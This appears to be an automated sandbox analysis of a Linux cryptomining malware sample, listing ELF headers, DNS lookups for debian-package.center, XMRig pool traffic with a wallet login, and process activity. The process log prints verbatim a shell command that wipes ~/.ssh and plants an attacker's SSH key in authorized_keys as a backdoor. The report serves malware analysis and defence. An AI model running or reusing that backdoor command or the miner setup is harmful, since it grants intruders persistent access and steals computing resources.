            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeFlagsFlags DescriptionAlignProg InterpreterSection Mappings
            LOAD0x00x00x00x156f80x156f80x4R 0x1000.gnu.hash .dynsym .dynstr .rela.dyn
            LOAD0x160000x160000x160000x1bbb380x1bbb380x5R E0x1000.init .plt .text .fini
            LOAD0x1d20000x1d20000x1d20000x6d9180x6d9180x4R 0x1000.rodata .eh_frame_hdr .eh_frame .gcc_except_table
            LOAD0x23fc400x240c400x240c400x9fd80x17aa80x6RW 0x1000.init_array .fini_array .ctors .dtors .data.rel.ro .dynamic .got .data .bss
            DYNAMIC0x248c500x249c500x249c500x1900x1900x6RW 0x8.dynamic
            TLS0x23fc400x240c400x240c400x00x200x4R 0x8
            GNU_EH_FRAME0x1eeef00x1eeef00x1eeef00xc18c0xc18c0x4R 0x4.eh_frame_hdr
            GNU_STACK0x00x00x00x00x00x6RW 0x10
            GNU_RELRO0x23fc400x240c400x240c400x93c00x93c00x4R 0x1.init_array .fini_array .ctors .dtors .data.rel.ro .dynamic .got

            Dynamic Tags

            TypeMetaValueTag
            DT_SYMBOLICvalue0x00x10
            DT_INITvalue0x160000xc
            DT_FINIvalue0x1d1b300xd
            DT_INIT_ARRAYvalue0x240c400x19
            DT_INIT_ARRAYSZbytes2640x1b
            DT_FINI_ARRAYvalue0x240d480x1a
            DT_FINI_ARRAYSZbytes240x1c
            DT_GNU_HASHvalue0x2380x6ffffef5
            DT_STRTABvalue0x2700x5
            DT_SYMTABvalue0x2580x6
            DT_STRSZbytes10xa
            DT_SYMENTbytes240xb
            DT_DEBUGvalue0x00x15
            DT_PLTGOTvalue0x249de00x3
            DT_RELAvalue0x2780x7
            DT_RELASZbytes871680x8
            DT_RELAENTbytes240x9
            DT_BIND_NOWvalue0x00x18
            DT_FLAGS_1value0x80000010x6ffffffb
            DT_RELACOUNTvalue36320x6ffffff9
            DT_NULLvalue0x00x0

            Symbols

            NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
            .dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF

            Network Behavior

            Network Port Distribution

            TCP Packets

            TimestampSource PortDest PortSource IPDest IP
            Jan 20, 2020 02:55:24.797347069 CET4516480192.168.2.2045.9.148.125
            Jan 20, 2020 02:55:24.825766087 CET804516445.9.148.125192.168.2.20
            Jan 20, 2020 02:55:24.825931072 CET4516480192.168.2.2045.9.148.125
            Jan 20, 2020 02:55:24.826159000 CET4516480192.168.2.2045.9.148.125
            Jan 20, 2020 02:55:24.851353884 CET804516445.9.148.125192.168.2.20
            Jan 20, 2020 02:55:24.941581964 CET804516445.9.148.125192.168.2.20
            Jan 20, 2020 02:55:24.941786051 CET4516480192.168.2.2045.9.148.125
            Jan 20, 2020 02:55:33.038753986 CET804516445.9.148.125192.168.2.20
            Jan 20, 2020 02:55:33.038959026 CET4516480192.168.2.2045.9.148.125
            Jan 20, 2020 02:55:48.821613073 CET804516445.9.148.125192.168.2.20
            Jan 20, 2020 02:55:48.821717978 CET4516480192.168.2.2045.9.148.125
            Jan 20, 2020 02:56:48.871293068 CET4516480192.168.2.2045.9.148.125
            Jan 20, 2020 02:56:48.896306992 CET804516445.9.148.125192.168.2.20
            Jan 20, 2020 02:56:49.451385975 CET4516480192.168.2.2045.9.148.125
            Jan 20, 2020 02:56:49.476771116 CET804516445.9.148.125192.168.2.20
            Jan 20, 2020 02:56:49.476799965 CET804516445.9.148.125192.168.2.20
            Jan 20, 2020 02:56:49.476937056 CET4516480192.168.2.2045.9.148.125
            Jan 20, 2020 02:57:49.971415997 CET4516480192.168.2.2045.9.148.125
            Jan 20, 2020 02:57:50.008258104 CET804516445.9.148.125192.168.2.20
            Jan 20, 2020 02:57:50.008428097 CET4516480192.168.2.2045.9.148.125
            Jan 20, 2020 02:58:29.038871050 CET804516445.9.148.125192.168.2.20
            Jan 20, 2020 02:58:29.038991928 CET4516480192.168.2.2045.9.148.125
            Jan 20, 2020 02:59:29.191299915 CET4516480192.168.2.2045.9.148.125
            Jan 20, 2020 02:59:29.216207027 CET804516445.9.148.125192.168.2.20
            Jan 20, 2020 02:59:29.792668104 CET4516480192.168.2.2045.9.148.125
            Jan 20, 2020 02:59:29.844615936 CET804516445.9.148.125192.168.2.20
            Jan 20, 2020 02:59:29.844810009 CET4516480192.168.2.2045.9.148.125

            UDP Packets

            TimestampSource PortDest PortSource IPDest IP
            Jan 20, 2020 02:55:24.767127991 CET5055053192.168.2.208.8.8.8
            Jan 20, 2020 02:55:24.771472931 CET5055053192.168.2.208.8.4.4
            Jan 20, 2020 02:55:24.771579027 CET5055053192.168.2.208.8.8.8
            Jan 20, 2020 02:55:24.771637917 CET5055053192.168.2.208.8.4.4
            Jan 20, 2020 02:55:24.792550087 CET53505508.8.8.8192.168.2.20
            Jan 20, 2020 02:55:24.796895027 CET53505508.8.4.4192.168.2.20
            Jan 20, 2020 02:55:24.796922922 CET53505508.8.4.4192.168.2.20
            Jan 20, 2020 02:55:24.796940088 CET53505508.8.8.8192.168.2.20
            Jan 20, 2020 02:55:37.752165079 CET3414453192.168.2.208.8.8.8
            Jan 20, 2020 02:55:37.752350092 CET4425053192.168.2.208.8.8.8
            Jan 20, 2020 02:55:37.777545929 CET53341448.8.8.8192.168.2.20
            Jan 20, 2020 02:55:37.777673006 CET53442508.8.8.8192.168.2.20

            DNS Queries

            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
            Jan 20, 2020 02:55:24.767127991 CET192.168.2.208.8.8.80xe437Standard query (0)debian-package.centerA (IP address)IN (0x0001)
            Jan 20, 2020 02:55:24.771472931 CET192.168.2.208.8.4.40xe437Standard query (0)debian-package.centerA (IP address)IN (0x0001)
            Jan 20, 2020 02:55:24.771579027 CET192.168.2.208.8.8.80xe558Standard query (0)debian-package.center28IN (0x0001)
            Jan 20, 2020 02:55:24.771637917 CET192.168.2.208.8.4.40xe558Standard query (0)debian-package.center28IN (0x0001)

            DNS Answers

            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
            Jan 20, 2020 02:55:24.792550087 CET8.8.8.8192.168.2.200xe437No error (0)debian-package.center45.9.148.117A (IP address)IN (0x0001)
            Jan 20, 2020 02:55:24.792550087 CET8.8.8.8192.168.2.200xe437No error (0)debian-package.center45.9.148.129A (IP address)IN (0x0001)
            Jan 20, 2020 02:55:24.792550087 CET8.8.8.8192.168.2.200xe437No error (0)debian-package.center45.9.148.125A (IP address)IN (0x0001)
            Jan 20, 2020 02:55:24.796895027 CET8.8.4.4192.168.2.200xe437No error (0)debian-package.center45.9.148.117A (IP address)IN (0x0001)
            Jan 20, 2020 02:55:24.796895027 CET8.8.4.4192.168.2.200xe437No error (0)debian-package.center45.9.148.129A (IP address)IN (0x0001)
            Jan 20, 2020 02:55:24.796895027 CET8.8.4.4192.168.2.200xe437No error (0)debian-package.center45.9.148.125A (IP address)IN (0x0001)

            HTTP Packets

            Session IDSource IPSource PortDestination IPDestination Port
            0192.168.2.204516445.9.148.12580
            TimestampkBytes transferredDirectionData
            Jan 20, 2020 02:55:24.826159000 CET1OUTData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 35 42 4c 41 76 4c 4e 61 79 65 66 71 4e 61 64 33 74 47 70 48 4b
            Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"45BLAvLNayefqNad3tGpHKPzviQUYHF1mCapMhgRuiiAJPYX4KyRCVg9veTmckPN7bDebx51LCuDQYyhFgVbUMhc4qY14CQ","pass":"x","agent":"XMRig/5.5.0 (Linux x86_64) libuv/1.34.0 gcc/8.3.0","algo":["cn/1",
            Jan 20, 2020 02:55:24.941581964 CET2INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 69 64 22 3a 31 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 22 31 66 30 33 37 38 38 32 2d 39 35 34 32 2d 34 66 31 39 2d 39 64 61 33 2d 65 62 32 63 61
            Data Ascii: {"jsonrpc":"2.0","id":1,"error":null,"result":{"id":"1f037882-9542-4f19-9da3-eb2caa8dfc59","job":{"blob":"0c0ce88e94f1051f116f4f8199258f404bfb08750d7ee00ea8b1233dcce50550aafaccc4c9505f00000029d0febf7e3a38cbc6167412e730c2aa8de694cc8669219b3176d
            Jan 20, 2020 02:55:33.038753986 CET2INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 30 63 30 63 39 34 39 31 39 34 66 31 30 35 31 66 31 31 36 66 34 66 38 31 39 39 32 35 38 66 34 30
            Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"0c0c949194f1051f116f4f8199258f404bfb08750d7ee00ea8b1233dcce50550aafaccc4c9505f000000296e6f49b008f8396d2f5eacf0c0fae7eadd509d0571e9f0bd03ea162c13f4044a12","job_id":"658855215858069","target":"37
            Jan 20, 2020 02:55:48.821613073 CET555INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 30 63 30 63 61 32 39 31 39 34 66 31 30 35 62 36 39 65 34 35 63 33 66 39 30 62 61 66 66 65 30 33
            Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"0c0ca29194f105b69e45c3f90baffe0374bef30da82f1f5f11ac2c795752ecf4ac3943afb29d6b00000029506e9251241a22f42933f5a23c61f54f09bd89e7c568a31ba1c72c9679c86b4b12","job_id":"440049441842439","target":"37
            Jan 20, 2020 02:56:49.451385975 CET556OUTData Raw: 7b 22 69 64 22 3a 32 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6b 65 65 70 61 6c 69 76 65 64 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 69 64 22 3a 22 31 66 30 33 37 38 38 32 2d 39 35 34 32 2d 34 66 31 39 2d 39
            Data Ascii: {"id":2,"jsonrpc":"2.0","method":"keepalived","params":{"id":"1f037882-9542-4f19-9da3-eb2caa8dfc59"}}
            Jan 20, 2020 02:56:49.476799965 CET556INData Raw: 7b 22 69 64 22 3a 32 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 73 74 61 74 75 73 22 3a 22 4b 45 45 50 41 4c 49 56 45 44 22 7d 7d 0a
            Data Ascii: {"id":2,"jsonrpc":"2.0","error":null,"result":{"status":"KEEPALIVED"}}
            Jan 20, 2020 02:57:49.971415997 CET557OUTData Raw: 7b 22 69 64 22 3a 33 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6b 65 65 70 61 6c 69 76 65 64 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 69 64 22 3a 22 31 66 30 33 37 38 38 32 2d 39 35 34 32 2d 34 66 31 39 2d 39
            Data Ascii: {"id":3,"jsonrpc":"2.0","method":"keepalived","params":{"id":"1f037882-9542-4f19-9da3-eb2caa8dfc59"}}
            Jan 20, 2020 02:57:50.008258104 CET557INData Raw: 7b 22 69 64 22 3a 33 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 73 74 61 74 75 73 22 3a 22 4b 45 45 50 41 4c 49 56 45 44 22 7d 7d 0a
            Data Ascii: {"id":3,"jsonrpc":"2.0","error":null,"result":{"status":"KEEPALIVED"}}
            Jan 20, 2020 02:58:29.038871050 CET557INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 30 63 30 63 63 34 39 32 39 34 66 31 30 35 62 65 66 31 35 39 30 66 30 33 62 35 35 65 30 36 38 35
            Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"0c0cc49294f105bef1590f03b55e06852ebf32b66c4e3a625d4156d807b52f55097c24260c4b2600000029988278e1740d00927953c6617b04f1083f6e6b025140762bcecc4e2be199c44603","job_id":"937501214398362","target":"37
            Jan 20, 2020 02:59:29.792668104 CET558OUTData Raw: 7b 22 69 64 22 3a 34 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6b 65 65 70 61 6c 69 76 65 64 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 69 64 22 3a 22 31 66 30 33 37 38 38 32 2d 39 35 34 32 2d 34 66 31 39 2d 39
            Data Ascii: {"id":4,"jsonrpc":"2.0","method":"keepalived","params":{"id":"1f037882-9542-4f19-9da3-eb2caa8dfc59"}}
            Jan 20, 2020 02:59:29.844615936 CET558INData Raw: 7b 22 69 64 22 3a 34 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 73 74 61 74 75 73 22 3a 22 4b 45 45 50 41 4c 49 56 45 44 22 7d 7d 0a
            Data Ascii: {"id":4,"jsonrpc":"2.0","error":null,"result":{"status":"KEEPALIVED"}}


            System Behavior

            General

            Start time:02:55:23
            Start date:20/01/2020
            Path:/tmp/cron
            Arguments:/tmp/cron
            File size:2401096 bytes
            MD5 hash:84945e9ea1950be3e870b798bd7c7559

            General

            Start time:02:55:23
            Start date:20/01/2020
            Path:/tmp/cron
            Arguments:n/a
            File size:2401096 bytes
            MD5 hash:84945e9ea1950be3e870b798bd7c7559

            General

            Start time:02:55:23
            Start date:20/01/2020
            Path:/bin/sh
            Arguments:sh -c "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
            File size:4 bytes
            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

            General

            Start time:02:55:23
            Start date:20/01/2020
            Path:/bin/sh
            Arguments:n/a
            File size:4 bytes
            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

            General

            Start time:02:55:23
            Start date:20/01/2020
            Path:/bin/rm
            Arguments:rm -rf .ssh
            File size:60272 bytes
            MD5 hash:b79876063d894c449856cca508ecca7f

            General

            Start time:02:55:23
            Start date:20/01/2020
            Path:/bin/sh
            Arguments:n/a
            File size:4 bytes
            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

            General

            Start time:02:55:23
            Start date:20/01/2020
            Path:/bin/mkdir
            Arguments:mkdir .ssh
            File size:76848 bytes
            MD5 hash:a97f666f21c85ec62ea47d022263ef41

            General

            Start time:02:55:23
            Start date:20/01/2020
            Path:/bin/sh
            Arguments:n/a
            File size:4 bytes
            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

            General

            Start time:02:55:23
            Start date:20/01/2020
            Path:/bin/chmod
            Arguments:chmod -R go= /home/user/.ssh
            File size:56112 bytes
            MD5 hash:32c8c7318223ebc5b934a78cfc153d6f

            General

            Start time:02:55:23
            Start date:20/01/2020
            Path:/tmp/cron
            Arguments:n/a
            File size:2401096 bytes
            MD5 hash:84945e9ea1950be3e870b798bd7c7559